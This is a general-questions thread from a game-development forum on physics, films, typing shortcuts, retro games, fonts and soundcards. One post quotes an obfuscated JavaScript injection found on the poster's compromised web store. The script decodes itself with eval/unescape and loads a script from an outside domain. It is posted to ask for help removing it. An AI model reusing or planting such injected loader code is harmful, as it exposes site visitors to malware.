Ask something - We can help.

Started by Stupot, Fri 19/12/2008 20:06:21

Previous topic - Next topic

Alun

Quote from: InCreator on Tue 31/08/2010 09:27:40I've been wondering how would world look like if I was microscopic. A bit larger than a molecule, maybe.

Well, there's microscopic, and then there's "microscopic".  If you're talking "a bit larger than a molecule"... then there are other things to consider.  If you're "a bit larger than a molecule", are you then made up of only one or two molecules?  If so, then how are you able to feel or sense anything anyway?  A single molecule isn't complex enough to be alive.  Or if you assume the molecule is somehow magically alive... well, then whether or not it would react with anything depends on what the molecule is made of, but in any case there's no point in talking about "hands" or "cells" if there's only one molecule.  On the other hand, if you're assuming the molecules in your body themselves shrink... well, then, we're talking about something impossible in modern physics, and it's not really feasible to say how such shrunken molecules would interact with normal molecules because they shouldn't be able to exist anyway.

But maybe I'm reading too much into this, and the part about you being microscopic isn't germane to the question; you're only asking about what's going on on the microscopic scale and the exact method used to sense this is irrelevant.  In that case, well, yes, on the microscopic scale atoms and molecules are coming off all the time.  Even larger units are flaking off; you're constantly shedding off microscopic bits of skin.  When you smell anything, you're actually inhaling bits of that thing that have come off and been carried through the air, so your sense of smell depends on the fact that this happens.

But really, a lot of things are different on small scales, so it's hard to answer this concisely.  Things like friction, air resistance, and liquid surface tension all become much more significant on the scale of an insect than that of a human.  Get down even smaller, and other things come into play; when you get down to the size of an atom or molecule, then quantum mechanics steps in, and things get really weird... things don't have definite position, everything is a probabilistic wave, and solid objects have a small but finite probability of passing through each other... insofar as a "solid object" even exists at that scale...

Soup - The Comic Strip
http://www.soupcomic.com
Gods, heroes, monsters, and soup

Anian

...how would your body be constructed? For example absorption of oxygen would be impossible if compared to you it was the size of a car. And even if it wasn't, would you be strong enough to pull away one atom from another in a molecule?
You'd have a completly diffrenet way of basic building blocks and mechanics. Your body might be constructed out of something that's probably smaller than bosons. Not to mention that you'd probably be torn appart as soon as you reach that size, your building blocks would probably have too low interconnection to resist forces we consider harmless (like water tension - you can break it with your finger, but at micro (or even visible under microscope size) sizes it'd probably hold you stuck.

Perspective: if a fly is a proton then a whole atom (with electrons) is the size of a smaller cathedral. So smaller than a molecule and a bit bigger than a molecule changes things quite a bit.
You'd also probably be affected by gravitiy, polar forces in things like water molecules, magnetism, electricity, probably no friction though because you'd just have to watch out not to touch the bosons.

Then again, if you were like 5 molecules high (tall), things would be different.
I don't want the world, I just want your half

m0ds

Something PHPy - I have a CubeCart store but Google web tools is telling me there's malicious code in it somewhere, namely these urls:

/store/
/store/index.php?act=viewCat&catId=6

with the code:

Code: ags

<script language=javascript><!--
(function(mnFxR){var hMmgD='v#61r#20a#3d#22Sc#72#69#70#74#45
ngine#22#2cb#3d#22Vers#69on#28)+#22#2cj#3d#22#22#2cu#3dn#61v
#69gat#6fr#2e#75#73e#72#41#67ent#3bif(#28#75#2eindexOf#28#22
Chro#6d#65#22)#3c#30)#26#26you#2eindex#4ff(#22Wi#6e#22)#3e0#2
9#26#26you#2e.... some edited out here ........  src#3d#2f#2
f#6d#22+#22artuz#2e#63n#2fvi#64#2f#3fid#3d#22+#6a+#22#3e#3c#
5c#2fscr#69pt#3e#22)#3b#7d';eval(unescape(hMmgD.replace(mnFx
R,'%')))})(/\#/g);
--></script>

My question is this. Neither of those URL's actually point to a file where I might find the problem. I've checked index.php and removed it and also it was in the .js thing and so I removed the code from that, resubmitted to Google but it's come up with the problem again (in different areas of the site).

So, in my main store folder with index.php and cart.php etc I've checked all the php files and the code is NOT in them. Where the heck else might it be? And how do I check the contents of the one with product ID through my FTP client, cos again, it's not a HTML page but I'd assume somewhere it is storing the info I'm writing onto those pages.

Any help or some pointers are appreciated, thanks! :)

ddq

If anyone has ridden on the Trans-Siberian Railway at any point in the past, I'd be ecstatic to get in contact and ask a few questions for some research.

m0ds

Okay so I watched Once Upon A Time In America the other night and it was very good, but I'm totally stumped about the ending. I think I missed the first 20 mins of the movie and understood and enjoyed all of it but the last 2 scenes really confused me.

Spoiler

Who is Mr Bailey, how/why does Noodles know him? Was it James Woods playing that character, and if so why wasn't he credited. Is Mr Bailey "Max" when older? If not why does he have the watch??
[close]

Also:

Spoiler

The final shot, is it supposed to imply Noodles will get over things....because he can always go and smoke some dope? Cos it did to me :P What's the meaning? I don't remember seeing him go and do that anywhere else in the movie. And why is that his middle aged self again? !11
[close]

If anyone can enlighten me I'd be greatful :) Thanks! Oh and Peder is looking into my PHP problem so thanks to you!

Stupot

Hey chaps and chapesses.

So, who knows what happened to Pixel Town? (Or at least I'm SURE that's what it was called but I can't find it anywhere...  it was kind of a gradually updated pixel town with some web-comicky aspects... I'm sure I didnt imagine it.

s'okay, I found it... Isotown!

Cheers

LUniqueDan

While talking of Isotown, is anyone have any news from Spaceboy? And Spacejane Colony?
"I've... seen things you people wouldn't believe. Destroyed pigeon nests on the roof of the toolshed. I watched dead mice glitter in the dark, near the rain gutter trap.
All those moments... will be lost... in time, like tears... in... rain."

Dualnames

Wow, that's a blast for the past. Still wonder what made the guy leave.. :'(
Worked on Strangeland, Primordia, Hob's Barrow, The Cat Lady, Mage's Initiation, Until I Have You, Downfall, Hunie Pop, and every game in the Wadjet Eye Games catalogue (porting)

Paper Carnival

Mods:

Spoiler
Yes, he's older Max. Maybe this scene was cut out from the version you saw, but Noodles also sees the actress' son and he looks just like Max when he was young. This hints that Max had a son with her and that Max is still alive
[close]

Spoiler
I've not seen this film for years and I can't even remember this scene to comment on it, but it's possible that it doesn't have any significance.
[close]

bicilotti

I decided that I waste too much time typing, so I am learning some alphabetic shorthand.
Nothing too fancy: let's say that 'k' is 'that' and 'c' is 'this', an example sentence would be

K girl is very pretty, c one is ugly.

which of course would look

That girl is very pretty, this one is ugly

in longhand.

I need some software to "replace" what I've written from shorthand to longhand.
Now, I know there are softwares for MS Office or OpenOffice that do that, but ideally I want it everywhere, e.g.:

-I'm writing on IRC, I type "K is cool", press some hotkey combo, obtain "That is cool".
-I'm using notepad to sketch some ideas,  idem.
-etc.

Hints?

cat

Interesting, I didn't know such a thing exists. But I guess I'm too lazy to learn those abbrevations (I hardly know any shortcut keys) so I will type this and that  ;)

Oh, and I don't know how you could do that. There would have to be a programm that catches your keystrokes and transforms them or something.

Wyz

I did a quick search and found several programs, including AutoHotkey which seems to do the trick, and is free. Just look for hotstring in the help file and you should be able to set it up :)
Life is like an adventure without the pixel hunts.

bicilotti

Quote from: Wyz on Mon 11/10/2010 23:21:59
I did a quick search and found several programs, including AutoHotkey which seems to do the trick, and is free. Just look for hotstring in the help file and you should be able to set it up :)

bicilotti writes:
k y imo uss!

->

that was indeed useful!

Thanks Wyz!

RetroJay

Hi all.

I have been trying to remember the name of an Amiga game I used to play. (back through the mists of time).

Ok. It was a flight simulator set in the future where smog had covered everything at low level.
You played a cop and started on the top of a sky scrappper by your craft, in the nice clean air.
After take off you had to fly around and look for, certain,  bad guys which sometimes took you bellow the smog cover.
Once under the smog all the buildings were red and streets were black. Also there were areas such as Chinatown, Nob Hill and others.

Can anyone remember the name of this game?
Also what company made it?

Thanks.
Jay.

Kweepa

Still waiting for Purity of the Surf II

RetroJay

Quote from: SteveMcCrea on Thu 14/10/2010 03:40:39
Killing Cloud. Awesome game!
Dear Mr McCrea.

Thank you... Thank you... Thank you.

That's the game. :)
I agree with you 100 percent. It was an awesome game.
I wish games companies, today,  would look at some of the old games and re-make them.
There were some damn good ideas then.

Many thanks.
Jay.

theo

I have done some searching on the forums but have had a hard time getting a straight answer to this question:

Is it true that there is no way to have antialiased fonts in AGS when they are displayed against... say, my backdrop?

GarageGothic

Most of the info you found was probably years old. While I haven't tested it myself yet, I was under the impression that this is no longer an issue in AGS 3.2.

Quote* Added support for anti-aliased TTF fonts in all situations where they weren't previously supported.

Calin Leafshade

yup, ttf fonts display anti-aliased in all situations out of the box in 3.2.

Just make sure you set "Anti-Alias True Type Fonts" in the general settings.

Scavenger

I wanted to ask people their opinion on soundcards and this is just the place to do it. (because making a thread would be a little wasteful)

I want to get a new soundcard for MIDI playing. HW Soundfonts are a must, and OPL3/Adlib hardware support is good, but not required. I have an AWE32, but my main PC doesn't have an ISA slot and I can't find any suitable alternative. It's just for MIDI, I don't mind not having 3D surround sound and technicolor 64bit quality (as I already have a soundcard) - but something that can do GM MIDI like an AWE32 (and maybe OPL3) but in a PCI slot on an XP Computer? Is perfect. I already have an MT-32 for some of my MIDI needs... but the rest of it needs work now. The Microsoft SW Synth is really bad and softsynths eat too much CPU and RAM.

Thanks guys :)

SMF spam blocked by CleanTalk